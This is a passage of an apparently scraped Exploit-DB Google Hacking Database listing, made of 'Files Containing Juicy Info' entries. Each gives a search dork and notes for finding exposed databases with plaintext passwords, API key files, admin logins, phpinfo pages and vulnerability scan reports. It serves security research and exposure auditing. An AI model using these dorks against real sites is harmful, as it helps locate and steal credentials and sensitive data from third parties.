<shortDescription>intitle:&quot;index.of *&quot; admin news.asp configview.asp</shortDescription>
<textualDescription>With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file â€ÃÅ“news.mdb’.For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.The database contains the plain text password. PS: this search is based on the index.of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way.</textualDescription>
<query>intitle:&quot;index.of *&quot; admin news.asp configview.asp</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22index.of+*%22+admin+news.asp+configview.asp</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>796</id>
<link>https://www.exploit-db.com/ghdb/796</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index.of&quot; .diz .nfo last modified</shortDescription>
<textualDescription>File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distroubtion site for pirated software. .nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives.</textualDescription>
<query>intitle:&quot;index.of&quot; .diz .nfo last modified</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; .diz .nfo last modified</querystring>
<edb></edb>
<date>2004-12-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>5734</id>
<link>https://www.exploit-db.com/ghdb/5734</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index.of&quot; intext:&quot;access.txt&quot;</shortDescription>
<textualDescription>AUTHOR: CANCOM #RedTeam
++ find server logs and possible password/access files ++
intitle:&quot;index.of&quot; intext:&quot;access.txt&quot;
ca. 500 Results
</textualDescription>
<query>intitle:&quot;index.of&quot; intext:&quot;access.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; intext:&quot;access.txt&quot;</querystring>
<edb></edb>
<date>2020-02-14</date>
<author>CANCOM #RedTeam</author>
</entry>
<entry>
<id>5735</id>
<link>https://www.exploit-db.com/ghdb/5735</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index.of&quot; intext:&quot;api.txt&quot;</shortDescription>
<textualDescription>AUTHOR: CANCOM #RedTeam
++ find possible api key files ++
intitle:&quot;index.of&quot; intext:&quot;api.txt&quot;
ca. 7300 Results
</textualDescription>
<query>intitle:&quot;index.of&quot; intext:&quot;api.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of&quot; intext:&quot;api.txt&quot;</querystring>
<edb></edb>
<date>2020-02-14</date>
<author>CANCOM #RedTeam</author>
</entry>
<entry>
<id>4767</id>
<link>https://www.exploit-db.com/ghdb/4767</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index.of.virtualbox&quot; -mirror -mirrors -public -ubuntu.com -edu -pub</shortDescription>
<textualDescription>Dorks containing full working Virtual machines images.
Also try: intitle:&quot;index.of.vmware&quot; -mirror -mirrors -public -ubuntu.com
-edu -keygen -bitdowload
for some VMWare Virtual machines.
Bruno Schmid
</textualDescription>
<query>intitle:&quot;index.of.virtualbox&quot; -mirror -mirrors -public -ubuntu.com -edu -pub</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index.of.virtualbox&quot; -mirror -mirrors -public -ubuntu.com -edu -pub</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>1276</id>
<link>https://www.exploit-db.com/ghdb/1276</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Joomla - Web Installer&quot;</shortDescription>
<textualDescription>Joomla! is a Content Management System (CMS) created by the same team that brought the Mambo CMS. This dork finds the Web Installer page. On newer versions, after you install, joomla asks to delete installation dir before to be functional.The Webinstaller gives an attacker information about the php configuration and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).The admin logon can be found searching: intitle:&quot;- Administration [Joomla]&quot; but there are no default passwords.</textualDescription>
<query>intitle:&quot;Joomla - Web Installer&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Joomla+-+Web+Installer%22&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7269</id>
<link>https://www.exploit-db.com/ghdb/7269</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;LiveZilla Server Page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;LiveZilla Server Page&quot;
# Files Containing Juicy Info
# Date:31/08/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;LiveZilla Server Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;LiveZilla Server Page&quot;</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7929</id>
<link>https://www.exploit-db.com/ghdb/7929</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;login&quot; intext:&quot;authorized users only&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;login&quot; intext:&quot;authorized users only&quot;
# Files Containing Juicy Info
# Date: 24/02/2022
# Exploit Author: Sumant Arora</textualDescription>
<query>intitle:&quot;login&quot; intext:&quot;authorized users only&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login&quot; intext:&quot;authorized users only&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Sumant Arora</author>
</entry>
<entry>
<id>1287</id>
<link>https://www.exploit-db.com/ghdb/1287</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;LOGREP - Log file reporting system&quot; -site:itefix.no</shortDescription>
<textualDescription>Logrep is an open source log file Extraction and Reporting System by ITeF!x. This dork finds the logs that it creates.</textualDescription>
<query>intitle:&quot;LOGREP - Log file reporting system&quot; -site:itefix.no</query>
<querystring>https://www.google.com/search?q=intitle%3A%22LOGREP+-+Log+file+reporting+system%22+-site%3Aitefix.no&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7939</id>
<link>https://www.exploit-db.com/ghdb/7939</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;ManageEngine Desktop Central 10&quot; AND (inurl:configurations OR inurl:authorization)</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ManageEngine Desktop Central 10&quot; AND (inurl:configurations OR inurl:authorization)
# Files Containing Juicy Info
# Date:17/06/2022
# Exploit Author: Zayed AlJaberi</textualDescription>
<query>intitle:&quot;ManageEngine Desktop Central 10&quot; AND (inurl:configurations OR inurl:authorization)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ManageEngine Desktop Central 10&quot; AND (inurl:configurations OR inurl:authorization)</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>752</id>
<link>https://www.exploit-db.com/ghdb/752</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Multimon UPS status page&quot;</shortDescription>
<textualDescription>Multimon provide UPS monitoring services</textualDescription>
<query>intitle:&quot;Multimon UPS status page&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Multimon+UPS+status+page%22</querystring>
<edb></edb>
<date>2004-12-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>7333</id>
<link>https://www.exploit-db.com/ghdb/7333</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Operations Automation Default Page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Operations Automation Default Page&quot;
# Files Containing Juicy Info
# Date:29/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Operations Automation Default Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Operations Automation Default Page&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8052</id>
<link>https://www.exploit-db.com/ghdb/8052</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Oracle WebLogic Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Oracle WebLogic Server&quot;
# Files Containing Juicy Info
# Date:06/02/2023
# Exploit Author: Eve Cohen</textualDescription>
<query>intitle:&quot;Oracle WebLogic Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Oracle WebLogic Server&quot;</querystring>
<edb></edb>
<date>2023-02-06</date>
<author>Eve Cohen</author>
</entry>
<entry>
<id>7513</id>
<link>https://www.exploit-db.com/ghdb/7513</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;password reset&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;password reset&quot;
# Files Containing Juicy Info
# Date:28/10/2021
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>intitle:&quot;password reset&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;password reset&quot;</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>723</id>
<link>https://www.exploit-db.com/ghdb/723</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;PHP Advanced Transfer&quot; (inurl:index.php | inurl:showrecent.php )</shortDescription>
<textualDescription>PHP Advacaned Transfer is GPL'd software that claims to be the &quot;The ultimate PHP download &amp; upload manager&quot;. This is a search for the main and recently changed files pages.</textualDescription>
<query>intitle:&quot;PHP Advanced Transfer&quot; (inurl:index.php | inurl:showrecent.php )</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22PHP+Advanced+Transfer%22+%28inurl%3Aindex.php+%7C+inurl%3Ashowrecent.php+%29</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4662</id>
<link>https://www.exploit-db.com/ghdb/4662</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;PHP Web Stat - Sysinfo&quot; intext:php inurl:stat/sysinfo.php</shortDescription>
<textualDescription>This dork list all server statistics , hardware details and installed
software details because of exposed phpsysinfo script
</textualDescription>
<query>intitle:&quot;PHP Web Stat - Sysinfo&quot; intext:php inurl:stat/sysinfo.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;PHP Web Stat - Sysinfo&quot; intext:php inurl:stat/sysinfo.php</querystring>
<edb></edb>
<date>2018-01-24</date>
<author>sandeep</author>
</entry>
<entry>
<id>7426</id>
<link>https://www.exploit-db.com/ghdb/7426</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;phpinfo()&quot; inurl:&quot;phpinfo.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;phpinfo()&quot; inurl:&quot;phpinfo.php&quot;
# Files Containing Juicy Info
# Date:11/10/2021
# Exploit Author: Michael Felix</textualDescription>
<query>intitle:&quot;phpinfo()&quot; inurl:&quot;phpinfo.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;phpinfo()&quot; inurl:&quot;phpinfo.php&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Michael Felix</author>
</entry>
<entry>
<id>693</id>
<link>https://www.exploit-db.com/ghdb/693</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;PhpMyExplorer&quot; inurl:&quot;index.php&quot; -cvs</shortDescription>
<textualDescription>PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory.</textualDescription>
<query>intitle:&quot;PhpMyExplorer&quot; inurl:&quot;index.php&quot; -cvs</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22PhpMyExplorer%22+inurl%3A%22index.php%22+-cvs</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7439</id>
<link>https://www.exploit-db.com/ghdb/7439</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Pi-hole - raspberrypi&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Pi-hole - raspberrypi&quot;
# Files Containing Juicy Info
# Date:11/10/2021
# Exploit Author: Cristi Vlad</textualDescription>
<query>intitle:&quot;Pi-hole - raspberrypi&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Pi-hole - raspberrypi&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Cristi Vlad</author>
</entry>
<entry>
<id>4810</id>
<link>https://www.exploit-db.com/ghdb/4810</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Powered by Qualys SSL Labs&quot;</shortDescription>
<textualDescription>Search for the SSL security report on the server with some sensitive
information.
Sang Bui
</textualDescription>
<query>intitle:&quot;Powered by Qualys SSL Labs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Powered by Qualys SSL Labs&quot;</querystring>
<edb></edb>
<date>2018-05-09</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>6614</id>
<link>https://www.exploit-db.com/ghdb/6614</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;PowerMTA&quot; inurl:logs</shortDescription>
<textualDescription>Files Containing Juicy Info
# Google Dork: intitle:&quot;PowerMTA&quot; inurl:logs
# Date: 10/15/2020
# Exploit Author: Javier Bernardo
Javier Bernardo
*Ethical Hacker | Information Security Engineer*
</textualDescription>
<query>intitle:&quot;PowerMTA&quot; inurl:logs</query>
<querystring>https://www.google.com/search?q=intitle:&quot;PowerMTA&quot; inurl:logs</querystring>
<edb></edb>
<date>2020-10-15</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4708</id>
<link>https://www.exploit-db.com/ghdb/4708</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Proberv0.&quot; | inurl:/proberv.php</shortDescription>
<textualDescription>intitle:&quot;Proberv0.&quot; | inurl:/proberv.php
Reveals a lot of sensitive information via Proberv.php
ManhNho
</textualDescription>
<query>intitle:&quot;Proberv0.&quot; | inurl:/proberv.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Proberv0.&quot; | inurl:/proberv.php</querystring>
<edb></edb>
<date>2018-03-22</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6389</id>
<link>https://www.exploit-db.com/ghdb/6389</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;report&quot; (&quot;Fortify&quot; | &quot;Web Inspect&quot;) filetype:pdf</shortDescription>
<textualDescription># Google Dork: intitle:&quot;report&quot; (&quot;Fortify&quot; | &quot;Web Inspect&quot;) filetype:pdf
# Date: 08-07-2020
#Description: This Google Dork allows retrieving reports of scanned
sites thereby identifying vulnerabilities and misconfigurations
present in an application/website.
# Exploit Author: S Suhas
</textualDescription>
<query>intitle:&quot;report&quot; (&quot;Fortify&quot; | &quot;Web Inspect&quot;) filetype:pdf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;report&quot; (&quot;Fortify&quot; | &quot;Web Inspect&quot;) filetype:pdf</querystring>
<edb></edb>
<date>2020-07-09</date>
<author>S Suhas</author>
</entry>
<entry>
<id>6388</id>
<link>https://www.exploit-db.com/ghdb/6388</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;report&quot; (&quot;OpenVAS&quot; | &quot;Nikto&quot;) ext:pdf OR ext:html</shortDescription>
<textualDescription># Google Dork: intitle:&quot;report&quot; (&quot;OpenVAS&quot; | &quot;Nikto&quot;) ext:pdf OR ext:html
# OpenVAS and Nikto vulnerability reports.
# Date: 8/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;report&quot; (&quot;OpenVAS&quot; | &quot;Nikto&quot;) ext:pdf OR ext:html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;report&quot; (&quot;OpenVAS&quot; | &quot;Nikto&quot;) ext:pdf OR ext:html</querystring>
<edb></edb>
<date>2020-07-09</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6379</id>
<link>https://www.exploit-db.com/ghdb/6379</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; | &quot;netsparker&quot; | &quot;nmap&quot;) filetype:html</shortDescription>
<textualDescription>Description : intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; |
&quot;netsparker&quot; | &quot;nmap&quot;) filetype:html
This dork allows identification and detection of
vulnerabilities arising from mis-configurations or flawed programming
within a network-based asset such as a firewall, router, web server,
application server, etc from already scanned reports.
*This html version is giving more reports of top companies than the PDF
version. please find the screenshots and compare with the pdf version.*
Thanks,
Sachin
</textualDescription>
<query>intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; | &quot;netsparker&quot; | &quot;nmap&quot;) filetype:html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; | &quot;netsparker&quot; | &quot;nmap&quot;) filetype:html</querystring>
<edb></edb>
<date>2020-07-07</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>8204</id>
<link>https://www.exploit-db.com/ghdb/8204</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;SCM Manager&quot; intext:1.60</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SCM Manager&quot; intext:1.60
# Files Containing Juicy Info
# Date:31/05/2023
# Exploit Author: Alexandros Pappas</textualDescription>
<query>intitle:&quot;SCM Manager&quot; intext:1.60</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SCM Manager&quot; intext:1.60</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8190</id>
<link>https://www.exploit-db.com/ghdb/8190</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Sharing API Info&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Sharing API Info&quot;
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: dmr</textualDescription>
<query>intitle:&quot;Sharing API Info&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sharing API Info&quot;</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>dmr</author>
</entry>
<entry>
<id>4268</id>
<link>https://www.exploit-db.com/ghdb/4268</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Skipfish . scan&quot;</shortDescription>
<textualDescription>Google Dork: intitle:&quot;Skipfish . scan&quot;
URL: http://www.google.com/search?q=intitle:%22Skipfish+.+scan%22
Description: Skipfish Vulnerability Scan Report
Author: Andrea (aka theMiddle) Menin
-theMiddle</textualDescription>
<query>intitle:&quot;Skipfish . scan&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Skipfish . scan&quot;</querystring>
<edb></edb>
<date>2016-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>94</id>
<link>https://www.exploit-db.com/ghdb/94</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;statistics of&quot; &quot;advanced web statistics&quot;</shortDescription>
<textualDescription>the awstats program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more which can provide very interesting recon information for an attacker.</textualDescription>
<query>intitle:&quot;statistics of&quot; &quot;advanced web statistics&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22statistics+of%22+%22advanced+web+statistics%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>251</id>
<link>https://www.exploit-db.com/ghdb/251</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;System Statistics&quot; +&quot;System and Network Information Center&quot;</shortDescription>
<textualDescription>This search reveals internal network information including network configuratino, ping times, services, and host info.</textualDescription>
<query>intitle:&quot;System Statistics&quot; +&quot;System and Network Information Center&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22System+Statistics%22+%2B%22System+and+Network+Information+Center%22</querystring>
<edb></edb>
<date>2004-05-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4870</id>
<link>https://www.exploit-db.com/ghdb/4870</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;This is pdfTeX, Version&quot;</shortDescription>
<textualDescription>intitle:&quot;This is pdfTeX, Version&quot;
pdfTeX logs information
ManhNho
</textualDescription>
<query>intitle:&quot;This is pdfTeX, Version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;This is pdfTeX, Version&quot;</querystring>
<edb></edb>
<date>2018-06-25</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4192</id>
<link>https://www.exploit-db.com/ghdb/4192</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;TurnKey LAMP&quot; intext:&quot;turnkey lamp release notes&quot; &quot;Apache PHP information&quot;</shortDescription>
<textualDescription>Detail:
Google results shows turnkey lamp default page which discloses information server like PHPINFO page, Apache server Status, webmin login page and many more.
[ Silent Z3R0 ]-[Pakistan Cyber Army]</textualDescription>
<query>intitle:&quot;TurnKey LAMP&quot; intext:&quot;turnkey lamp release notes&quot; &quot;Apache PHP information&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TurnKey LAMP&quot; intext:&quot;turnkey lamp release notes&quot; &quot;Apache PHP information&quot;</querystring>
<edb></edb>
<date>2016-02-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1161</id>
<link>https://www.exploit-db.com/ghdb/1161</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;urchin (5|3|admin)&quot; ext:cgi</shortDescription>
<textualDescription>Gain access to Urchin analysis reports.</textualDescription>
<query>intitle:&quot;urchin (5|3|admin)&quot; ext:cgi</query>
<querystring>https://www.google.com/search?q=intitle%3A%22urchin+%285%7C3%7Cadmin%29%22+ext%3Acgi</querystring>
<edb></edb>
<date>2005-10-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>95</id>
<link>https://www.exploit-db.com/ghdb/95</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Usage Statistics for&quot; &quot;Generated by Webalizer&quot;</shortDescription>
<textualDescription>The webalizer program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker.</textualDescription>
<query>intitle:&quot;Usage Statistics for&quot; &quot;Generated by Webalizer&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Usage+Statistics+for%22+%22Generated+by+Webalizer%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>8034</id>
<link>https://www.exploit-db.com/ghdb/8034</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;WAMPSERVER Homepage&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WAMPSERVER Homepage&quot;
# Files Containing Juicy Info
# Date:19/09/2022
# Exploit Author: HackerFrenzy</textualDescription>
<query>intitle:&quot;WAMPSERVER Homepage&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WAMPSERVER Homepage&quot;</querystring>
<edb></edb>
<date>2022-09-19</date>
<author>HackerFrenzy</author>
</entry>
<entry>
<id>8357</id>
<link>https://www.exploit-db.com/ghdb/8357</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;WAMPSERVER Homepage&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WAMPSERVER Homepage&quot;
# Files Containing Juicy Info
# Date: 27/11/2023
# Exploit Author: Saleh Lardhi
</textualDescription>
<query>intitle:&quot;WAMPSERVER Homepage&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WAMPSERVER Homepage&quot;</querystring>
<edb></edb>
<date>2023-11-27</date>
<author>Saleh Lardhi</author>
</entry>
<entry>
<id>3874</id>
<link>https://www.exploit-db.com/ghdb/3874</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;WAMPSERVER Homepage&quot; &amp; intext:&quot;Server Configuration&quot;</shortDescription>
<textualDescription>#Summary: Wampserver Homepage free access (*http://www.wampserver.com/).*
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;WAMPSERVER Homepage&quot; &amp; intext:&quot;Server Configuration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WAMPSERVER Homepage&quot; &amp; intext:&quot;Server Configuration&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>102</id>
<link>https://www.exploit-db.com/ghdb/102</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;wbem&quot; compaq login &quot;Compaq Information Technologies Group&quot;</shortDescription>
<textualDescription>These devices are running HP Insight Management Agents for Servers which &quot;provide device information for all managed subsystems. Alerts are generated by SNMP traps.&quot; The information on these pages include server addresses and other assorted SNMP information.</textualDescription>
<query>intitle:&quot;wbem&quot; compaq login &quot;Compaq Information Technologies Group&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22wbem%22+compaq+login+%22Compaq+Information+Technologies+Group%22&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>636</id>
<link>https://www.exploit-db.com/ghdb/636</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Web Server Statistics for ****&quot;</shortDescription>
<textualDescription>These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages, SQL statements, etc.</textualDescription>
<query>intitle:&quot;Web Server Statistics for ****&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22Web+Server+Statistics+for+****%22</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>868</id>
<link>https://www.exploit-db.com/ghdb/868</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;web server status&quot; SSH Telnet</shortDescription>
<textualDescription>simple port scanners for most common ports</textualDescription>
<query>intitle:&quot;web server status&quot; SSH Telnet</query>
<querystring>https://www.google.com/search?q=intitle:%22web+server+status%22+SSH+Telnet</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1195</id>
<link>https://www.exploit-db.com/ghdb/1195</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Welcome to F-Secure Policy Manager Server Welcome Page&quot;</shortDescription>
<textualDescription>An attacker may want to know about the antivirus software running. The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host.</textualDescription>
<query>intitle:&quot;Welcome to F-Secure Policy Manager Server Welcome Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Welcome+to+F-Secure+Policy+Manager+Server+Welcome+Page%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>789</id>
<link>https://www.exploit-db.com/ghdb/789</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;welcome.to.squeezebox&quot;</shortDescription>
<textualDescription>squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.This is neat, on top of giving out all sorts of enumeration information, it also allows one to paruse the music collection on the box, as well as listen if you install the aplet. Way cool.</textualDescription>
<query>intitle:&quot;welcome.to.squeezebox&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22welcome.to.squeezebox%22+</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>8134</id>
<link>https://www.exploit-db.com/ghdb/8134</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:'Sypex Dumper&quot; inurl:sxd</shortDescription>
<textualDescription># Google Dork: intitle:'Sypex Dumper&quot; inurl:sxd
# Files Containing Juicy Info
# Date:06/04/2023
# Exploit Author: Cyber Cyber</textualDescription>
<query>intitle:'Sypex Dumper&quot; inurl:sxd</query>
<querystring>https://www.google.com/search?q=intitle:'Sypex Dumper&quot; inurl:sxd</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Cyber Cyber</author>
</entry>
<entry>
<id>124</id>
<link>https://www.exploit-db.com/ghdb/124</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:admin intitle:login</shortDescription>
<textualDescription>This search can find administrative login pages. Not a vulnerability in and of itself, this query serves as a locator for administrative areas of a site. Further investigation of the surrounding directories can often reveal interesting information.</textualDescription>
<query>intitle:admin intitle:login</query>
<querystring>https://www.google.com/search?q=intitle%3Aadmin+intitle%3Alogin</querystring>
<edb></edb>
<date>2004-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>8058</id>
<link>https://www.exploit-db.com/ghdb/8058</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:BioTime AND intext:ZKTeco Security LLC</shortDescription>
<textualDescription># Google Dork: intitle:BioTime AND intext:ZKTeco Security LLC
# Files Containing Juicy Info
# Date:09/02/2023
# Exploit Author: Robot Shell</textualDescription>
<query>intitle:BioTime AND intext:ZKTeco Security LLC</query>
<querystring>https://www.google.com/search?q=intitle:BioTime AND intext:ZKTeco Security LLC</querystring>
<edb></edb>
<date>2023-02-09</date>
<author>Robot Shell</author>
</entry>
<entry>
<id>1167</id>
